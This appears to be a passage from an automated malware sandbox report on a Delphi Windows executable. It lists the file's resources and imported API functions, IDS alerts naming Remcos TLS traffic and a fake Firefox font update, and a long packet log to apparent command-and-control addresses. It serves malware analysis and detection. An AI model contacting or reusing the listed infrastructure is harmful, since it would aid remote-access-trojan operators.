                                                            RT_BITMAP | 0x105904 | 0xd0 | Device independent bitmap graphic, 13 x 13 x 4, image size 104 | English | United States | 0.47115384615384615
                                                            RT_BITMAP | 0x1059d4 | 0x128 | Device independent bitmap graphic, 21 x 16 x 4, image size 192 | English | United States | 0.36824324324324326
                                                            RT_BITMAP | 0x105afc | 0x128 | Device independent bitmap graphic, 17 x 16 x 4, image size 192 | English | United States | 0.28716216216216217
                                                            RT_BITMAP | 0x105c24 | 0x128 | Device independent bitmap graphic, 21 x 16 x 4, image size 192 | English | United States | 0.3885135135135135
                                                            RT_BITMAP | 0x105d4c | 0x128 | Device independent bitmap graphic, 19 x 16 x 4, image size 192 | English | United States | 0.375
                                                            RT_BITMAP | 0x105e74 | 0x128 | Device independent bitmap graphic, 21 x 16 x 4, image size 192 | English | United States | 0.375
                                                            RT_BITMAP | 0x105f9c | 0xe8 | Device independent bitmap graphic, 13 x 16 x 4, image size 128 | English | United States | 0.36637931034482757
                                                            RT_BITMAP | 0x106084 | 0x128 | Device independent bitmap graphic, 17 x 16 x 4, image size 192 | English | United States | 0.35135135135135137
                                                            RT_BITMAP | 0x1061ac | 0x128 | Device independent bitmap graphic, 20 x 16 x 4, image size 192 | English | United States | 0.36486486486486486
                                                            RT_BITMAP | 0x1062d4 | 0xd0 | Device independent bitmap graphic, 13 x 13 x 4, image size 104 | English | United States | 0.47115384615384615
                                                            RT_BITMAP | 0x1063a4 | 0x128 | Device independent bitmap graphic, 21 x 16 x 4, image size 192 | English | United States | 0.3581081081081081
                                                            RT_BITMAP | 0x1064cc | 0x128 | Device independent bitmap graphic, 17 x 16 x 4, image size 192 | English | United States | 0.28716216216216217
                                                            RT_BITMAP | 0x1065f4 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | English | United States | 0.4870689655172414
                                                            RT_ICON | 0x1066dc | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 1889 x 1889 px/m | | | 0.30230496453900707
                                                            RT_ICON | 0x106b44 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 1889 x 1889 px/m | | | 0.1942622950819672
                                                            RT_ICON | 0x1074cc | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 1889 x 1889 px/m | | | 0.1676829268292683
                                                            RT_ICON | 0x108574 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 1889 x 1889 px/m | | | 0.11058091286307054
                                                            RT_ICON | 0x10ab1c | 0x178b | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9465737514518002
                                                            RT_DIALOG | 0x10c2a8 | 0x52 | data | | | 0.7682926829268293
                                                            RT_DIALOG | 0x10c2fc | 0x52 | data | | | 0.7560975609756098
                                                            RT_STRING | 0x10c350 | 0x160 | data | | | 0.4460227272727273
                                                            RT_STRING | 0x10c4b0 | 0x38c | Targa image data - Color 99 x 107 x 32 +68 +111 "z" | | | 0.44162995594713655
                                                            RT_STRING | 0x10c83c | 0x1cc | data | | | 0.558695652173913
                                                            RT_STRING | 0x10ca08 | 0xcc | data | | | 0.6764705882352942
                                                            RT_STRING | 0x10cad4 | 0x114 | data | | | 0.6086956521739131
                                                            RT_STRING | 0x10cbe8 | 0x350 | data | | | 0.43514150943396224
                                                            RT_STRING | 0x10cf38 | 0x3bc | data | | | 0.3817991631799163
                                                            RT_STRING | 0x10d2f4 | 0x370 | data | | | 0.4022727272727273
                                                            RT_STRING | 0x10d664 | 0x3cc | data | | | 0.33539094650205764
                                                            RT_STRING | 0x10da30 | 0x214 | data | | | 0.49624060150375937
                                                            RT_STRING | 0x10dc44 | 0xcc | data | | | 0.6274509803921569
                                                            RT_STRING | 0x10dd10 | 0x194 | data | | | 0.5643564356435643
                                                            RT_STRING | 0x10dea4 | 0x3c4 | data | | | 0.3288381742738589
                                                            RT_STRING | 0x10e268 | 0x338 | data | | | 0.42961165048543687
                                                            RT_STRING | 0x10e5a0 | 0x294 | data | | | 0.42424242424242425
                                                            RT_RCDATA | 0x10e834 | 0x10 | data | | | 1.5
                                                            RT_RCDATA | 0x10e844 | 0x340 | data | | | 0.6899038461538461
                                                            RT_RCDATA | 0x10eb84 | 0x35b08 | GIF image data, version 89a, 600 x 300 | English | United States | 0.6345128960675179
                                                            RT_RCDATA | 0x14468c | 0x10463 | Delphi compiled form 'TfMain' | | | 0.12409427084114673
                                                            RT_GROUP_CURSOR | 0x154af0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
                                                            RT_GROUP_CURSOR | 0x154b04 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
                                                            RT_GROUP_CURSOR | 0x154b18 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
                                                            RT_GROUP_CURSOR | 0x154b2c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
                                                            RT_GROUP_CURSOR | 0x154b40 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
                                                            RT_GROUP_CURSOR | 0x154b54 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
                                                            RT_GROUP_CURSOR | 0x154b68 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
                                                            RT_GROUP_ICON | 0x154b7c | 0x4c | data | | | 0.8289473684210527
                                                            DLL | Import
                                                            oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                            advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                            user32.dll | GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                                                            kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                            kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                            user32.dll | CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextExA, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                            gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SetArcDirection, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RoundRect, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, PlayEnhMetaFile, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, LPtoDP, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionA, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, FillRgn, ExcludeClipRect, Ellipse, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgnIndirect, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateEnhMetaFileA, CreateEllipticRgnIndirect, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CombineRgn, CloseEnhMetaFile, BitBlt
                                                            version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                            kernel32.dll | lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtectEx, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, QueryDosDeviceA, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalSize, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVolumeInformationA, GetVersionExA, GetVersion, GetUserDefaultLCID, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDriveTypeA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                            advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                                                            oleaut32.dll | GetErrorInfo, SysFreeString
                                                            ole32.dll | CreateStreamOnHGlobal, IsAccelerator, OleDraw, OleSetMenuDescriptor, CoCreateInstance, CoGetClassObject, CoUninitialize, CoInitialize, IsEqualGUID
                                                            kernel32.dll | Sleep
                                                            oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                            comctl32.dll | _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_GetIcon, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                            Language of compilation system | Country where language is spoken | Map
                                                            English | United States |
                                                            Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                            2024-12-19T08:00:24.178681+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49710 | 103.82.231.117 | 443 | TCP
                                                            2024-12-19T08:00:30.775132+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.7 | 49725 | 185.174.103.111 | 2404 | TCP
                                                            2024-12-19T08:00:33.888987+0100 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.7 | 49736 | 178.237.33.50 | 80 | TCP
                                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                            Dec 19, 2024 08:00:22.334625959 CET | 49709 | 443 | 192.168.2.7 | 103.82.231.117
                                                            Dec 19, 2024 08:00:22.334697008 CET | 443 | 49709 | 103.82.231.117 | 192.168.2.7
                                                            Dec 19, 2024 08:00:22.334774971 CET | 49709 | 443 | 192.168.2.7 | 103.82.231.117
                                                            Dec 19, 2024 08:00:22.343753099 CET | 49709 | 443 | 192.168.2.7 | 103.82.231.117
                                                            Dec 19, 2024 08:00:22.343849897 CET | 443 | 49709 | 103.82.231.117 | 192.168.2.7
                                                            Dec 19, 2024 08:00:22.343904018 CET | 49709 | 443 | 192.168.2.7 | 103.82.231.117
                                                            Dec 19, 2024 08:00:22.434791088 CET | 49710 | 443 | 192.168.2.7 | 103.82.231.117
                                                            Dec 19, 2024 08:00:22.434844017 CET | 443 | 49710 | 103.82.231.117 | 192.168.2.7
                                                            Dec 19, 2024 08:00:22.434932947 CET | 49710 | 443 | 192.168.2.7 | 103.82.231.117
                                                            Dec 19, 2024 08:00:22.477561951 CET | 49710 | 443 | 192.168.2.7 | 103.82.231.117
                                                            Dec 19, 2024 08:00:22.477596998 CET | 443 | 49710 | 103.82.231.117 | 192.168.2.7
                                                            Dec 19, 2024 08:00:24.178611994 CET | 443 | 49710 | 103.82.231.117 | 192.168.2.7
                                                            Dec 19, 2024 08:00:24.178680897 CET | 49710 | 443 | 192.168.2.7 | 103.82.231.117
                                                            Dec 19, 2024 08:00:24.182118893 CET | 49710 | 443 | 192.168.2.7 | 103.82.231.117
                                                            Dec 19, 2024 08:00:24.182132006 CET | 443 | 49710 | 103.82.231.117 | 192.168.2.7
                                                            Dec 19, 2024 08:00:24.182411909 CET | 443 | 49710 | 103.82.231.117 | 192.168.2.7
                                                            Dec 19, 2024 08:00:24.231065035 CET | 49710 | 443 | 192.168.2.7 | 103.82.231.117
                                                            Dec 19, 2024 08:00:24.285278082 CET | 49710 | 443 | 192.168.2.7 | 103.82.231.117
                                                            Dec 19, 2024 08:00:24.331337929 CET | 443 | 49710 | 103.82.231.117 | 192.168.2.7
                                                            Dec 19, 2024 08:00:25.011461020 CET | 443 | 49710 | 103.82.231.117 | 192.168.2.7
                                                            Dec 19, 2024 08:00:25.062093019 CET | 49710 | 443 | 192.168.2.7 | 103.82.231.117
                                                            Dec 19, 2024 08:00:25.259005070 CET | 443 | 49710 | 103.82.231.117 | 192.168.2.7
                                                            Dec 19, 2024 08:00:25.259021044 CET | 443 | 49710 | 103.82.231.117 | 192.168.2.7
                                                            Dec 19, 2024 08:00:25.259042025 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.259051085 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.259078979 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.259092093 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.259110928 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.259135008 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.259161949 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.319042921 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.319056988 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.319092989 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.319114923 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.319133043 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.319175959 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.319175959 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.519511938 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.519540071 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.520071030 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.520101070 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.520176888 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.556188107 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.556222916 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.556380987 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.556401014 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.556456089 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.599661112 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.599689007 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.599973917 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.599991083 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.600104094 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.746712923 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.746798038 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.746882915 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.746912956 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.746953011 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.746953011 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.767029047 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.767097950 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.767169952 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.767189980 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.767240047 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.767240047 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.782567024 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.782618999 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.782753944 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.782753944 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.782776117 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.782840967 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.798125029 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.798182964 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.798341990 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.798341990 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.798377037 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.798490047 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.813539028 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.813608885 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.813771009 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.813771009 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.813795090 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.814835072 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.860404015 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.860434055 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.860568047 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.860569000 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.860596895 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.862843990 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.940372944 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.940407991 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.940502882 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.940502882 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.940534115 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.942754030 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.988445997 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.988502026 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.988588095 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.988588095 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.988614082 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.988706112 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.995989084 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.996036053 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.996090889 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.996121883 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:25.996140003 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:25.996226072 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:26.004549026 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:26.004595041 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:26.004684925 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:26.004684925 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:26.004700899 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:26.004739046 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:26.011533022 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:26.011580944 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:26.011704922 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:26.011704922 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:26.011715889 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:26.011837959 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:26.020104885 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:26.020163059 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:26.020241976 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:26.020241976 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:26.020251989 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:26.020365000 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:26.027151108 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:26.027173042 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:26.027280092 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:26.027280092 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:26.027291059 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:26.027333975 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:26.035306931 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:26.035342932 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:26.035432100 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:26.035432100 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:26.035444021 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:26.035880089 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:26.126873970 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:26.126904011 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:26.126944065 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:26.126971006 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:26.126990080 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:26.127007961 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:26.177676916 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:26.177706003 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:26.177752972 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:26.177776098 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:26.177800894 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:26.177823067 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:26.185628891 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:26.185657978 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:26.185697079 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:26.185719013 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:26.185741901 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:26.185796022 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:26.192424059 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:26.192456961 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:26.192486048 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:26.192503929 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:26.192536116 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:26.192548990 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:26.200149059 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:26.200175047 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:26.200208902 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:26.200227022 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:26.200253963 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:26.200270891 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:26.207743883 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:26.207772017 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:26.207807064 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:26.207822084 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:26.207865000 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:26.207885027 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:26.228409052 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:26.228435993 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:26.228481054 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:26.228498936 CET44349710103.82.231.117192.168.2.7
                                                            Dec 19, 2024 08:00:26.228534937 CET49710443192.168.2.7103.82.231.117
                                                            Dec 19, 2024 08:00:26.228554964 CET49710443192.168.2.7103.82.231.117
